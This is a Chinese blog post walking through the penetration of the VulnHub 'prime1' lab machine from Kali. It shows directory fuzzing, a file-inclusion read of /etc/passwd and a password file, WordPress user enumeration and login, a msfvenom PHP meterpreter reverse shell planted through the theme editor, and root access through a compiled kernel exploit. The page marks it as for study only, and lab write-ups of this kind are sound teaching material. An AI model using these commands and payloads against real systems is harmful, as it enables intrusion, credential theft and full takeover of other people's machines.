kali渗透之从0到root的操作系统渗透全过程

最新推荐文章于 2024-05-22 09:58:13 发布
最新推荐文章于 2024-05-22 09:58:13 发布
阅读量2.3k 收藏 21
点赞数 6
分类专栏: kali渗透 文章标签: php 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56988395/article/details/123092285
版权

目录

攻击机

靶机

扫目录

根据提示进行fuzz:模糊测试

尝试wordpress

接下进行注入,在主题编辑器里进行写入木马

提权

注:以下内容仅供学习,请勿用于非法途径

攻击机

kali

靶机

prime1

链接: https://pan.baidu.com/s/1DEXUTVoRNhaYw_CqNzEqow?pwd=4bm5 提取码: 4bm5

或者直接去vulnhub.com下载,里面有各类镜像

首先进入靶机

发现什么都没有

扫目录

dirb 目标域名

dirb 目标域名 -X .txt,.php,.zip(过滤)

分别访问这几个地址,发现提示

根据提示进行fuzz:模糊测试

fuzz的功能有

  1. 目录扫描

  2. 找参数

  3. 密码爆破 username password

  4. 找SQL,XSS

  5. 压力测试

kali有自带(-w 指定字典路径)

wfuzz -w http://192.168.0.x/index.php?FUZZ(正常扫描)

wfuzz -w --hw 12 http://192.168.0.x/index.php?FUZZ(过滤扫描)

wfuzz -w /usr/share/wordlists/dirb/common.txt --hw 12 http://192.168.0.103/index.php?FUZZ

file?推测是文件包含,然后记得之前的提示

所以file=location.txt

http://192.168.0.103/index.php?file=location.txt

根据提示进一步深入

http://192.168.0.103/image.php?secrettier360=/etc/passwd

:find password.txt file in my directory:/home/saket

进一步深入

http://192.168.0.103/image.php?secrettier360=/home/saket/password.txt

疑似的密码

follow_the_ippsec

所以22端口这里可能不行,换一条线

尝试wordpress

http://192.168.0.103/wordpress/

可以通过author=?来确定用户名

或者直接用wpscan进行扫描得到用户名

wpscan --url xxx --enumerate u(专门扫描wordpress的)

wpscan --url http://192.168.0.103/wordpress --enumerate u

用刚刚得到的密码和用户进行登录

Victor

follow_the_ippsec

接下进行注入,在主题编辑器里进行写入木马

一个个试最后发现在这里可以写入

利用MSF生成木马

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -o shell

.php

复制,主要不要把开头的/*复制进去,粘贴到WP

启动监听

开始连接

http://192.168.0.103/wordpress/wp-content/themes/twentynineteen/secret.php

成功建立会话

提权

查找刚刚扫出来的版本是否存在可利用漏洞

msf6 > searchsploit 16.04 Ubuntu

编译好文件然后上传进行提权

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

编译用gcc

gcc 45010.c -o 45010

利用msf上传到tmp目录,因为tmp 任何一个目录都可以执行权限

meterpreter > upload /root/45010 /tmp/45010

进入shell进行加权和执行

cd /tmp

chmod +x 45010

./45010

翎~翊
关注
  • 6
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
kali linux将默认的非root提升为root权限
m0_57133702的博客
10-18 689
4、 按下”E“键后,会跳到这个界面,然后按下键(↓)光标会移动到“ linux ”开头的那一行!再将光标移到最后那里,空一格,输入“init=/bin/bash”,最终修改的内容如下图所示,后面无论写了什么,最后都要是“rw quiet splash init=/bin/bash”,差了哪个换那个,假设界面原本显示的是“ro abcdefg”,那么,我们就要改成“rw quiet splash init=/bin/bash”;3、到了这个界面后,在5秒的时间内按下“E”键(键盘上的E,不区分大小写);
利用Kali 完成一次简单的渗透
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
如何使用kali来入侵(渗透)一台windows
最新发布
zz12345600354的博客
05-22 663
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
渗透测试kali使用教程(一):常用命令和基本工具使用
热门推荐
u011871680的博客
12-03 4万+
kali教程
kali linux安全渗透教程
ITSM/ITIL/网络安全/IT运维
07-08 3938
第1章 Linux安全渗透简介 渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析,积极发现系统和网络中存在的各种缺陷和弱点,如设计缺陷和技术缺陷。本章将简要介绍Linux安全渗透安全渗透工具的相关内容。其主要知识点如下: 什么是安全渗透安全渗透所需的工具; Kali Linux简介; 安装Kali Linux; Kali更新与升级; 基本设置。 1.1 什么是安全渗透 渗透测试并没有一个标准的定义。国外一些安全组织达成共识的通用说法是,渗透测试是通过模拟恶意黑客的攻击
kali linux fuzz工具集简述
weixin_34009794的博客
03-29 1595
模糊测试是一种自动化软件测试技术,涉及提供无效,意外或随机数据作为计算机程序的输入。 然后监视程序是否存在异常,例如崩溃,内置代码断言失败或潜在的内存泄漏。 通常,模糊器用于测试采用结构化输入的程序。 例如,以文件格式或协议指定该结构,并将有效与无效输入区分开。 有效的模糊器生成“有效”的半有效输入,因为它们不会被解析器直接拒绝,但会在程序中更深层次地创建意外行为,并且“足够无效”以暴露尚未正确处...
Kali Linux渗透测试技术详解_渗透测试入门
wangluoanquan111的博客
09-19 694
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中。
Kali渗透系统2018.1
06-13
Kali渗透系统,版本是2018.1,经过虚拟机测试,亲测可用。
基于Kali Linux的渗透测试.pdf
09-06
基于Kali Linux的渗透测试.pdf 本文档总结了基于Kali Linux的渗透测试...本文档提供了基于Kali Linux的渗透测试的知识点,涵盖了渗透测试的概念、方法、工具和过程等方面,为读者提供了一个系统的了解渗透测试的机会。
kali渗透
07-24
kali渗透kali渗透kali渗透kali渗透kali渗透kali渗透
Kali Linux渗透测试实战 2.2 操作系统指纹识别.pdf
01-06
Kali Linux渗透测试实战 2.2 操作系统指纹识别
kail linux渗透流程
06-03
kail linux 渗透测试过程详细流程图,以xmind文件展示,支持自己修改
专注于非越狱环境下iOS应用逆向研究,从dylib注入,应用重签名到App Hook.zip
09-24
专注于非越狱环境下iOS应用逆向研究,从dylib注入,应用重签名到App Hook.zip,专注于非越狱环境下iOS应用逆向研究,从dylib注入,应用重签名到App Hook
Kali渗透测试技术实战
07-24
整个过程包含五个阶段:侦察、扫描、获取访问、维持访问以及清除痕迹。 第二章 下载并安装Kali Linux 硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、...
Kali工具集测试-(盲破)协议主动探测
qq_20031585的博客
04-06 4222
本文汇总说明在已知可联网但没有其他信息的情况下,如何通过扫描工具探测目标机的可用连接方式,尝试获取运行数据。
Kali中常用打靶工具及命令(随时补充)
zg_111的博客
04-14 1727
Gopherus工具是用来专门生成gopher协议的payload工具,通过gopher协议的以及各种被攻击应用的tcp包特点来构造payload。
Kali Linux 安全渗透教程<第一更>
大学霸__IT达人
05-29 4753
Kali Linux 安全渗透教程 目录 第1章  Linux安全渗透简介 1.1  什么是安全渗透 1.2  安全渗透所需工具 1.3  Kali Linux简介 1.4  安装Kali Linux 1.4.1  安装至硬盘 1.4.2  安装至USB驱动器 1.4.3  安装至VMware Workstation 1.4.4  安装WMware Tools 1.5  Ka
小白Kali渗透(一)
weixin_42077203的博客
02-22 4324
Kali渗透(一) —— 道爷低血糖 一、替换源 root@kali:~# vim /etc/apt/sources.list 注释掉原来的外网源 后面的是阿里云、清华、中科大镜像源网站 root@kali:~# apt update 问题1:签名无效 解决: root@kali:~# vim /etc/apt/apt.conf.d/70debconf ```![在这里插入图片描述](https://img-blog.csdnimg.cn/20210222205944536.png) 增...
kali渗透鸿蒙系统
02-16
Kali Linux是一款基于Debian的Linux发行版,专注于渗透测试和网络安全。它提供了大量的渗透测试工具和资源,使安全专业人员能够评估和测试系统的安全性。 而鸿蒙系统(HarmonyOS)是华为公司自主研发的分布式操作系统,旨在为各种设备提供统一的操作系统解决方案。鸿蒙系统具有高度灵活性和可扩展性,可以在智能手机、平板电脑、智能手表、智能电视等多种设备上运行。 由于Kali Linux是一个专注于渗透测试操作系统,而鸿蒙系统是一个智能设备的操作系统,它们之间并没有直接的关联。在渗透测试中,如果需要对鸿蒙系统进行测试,可以使用Kali Linux中的渗透测试工具来进行相关的测试和评估。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

翎~翊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值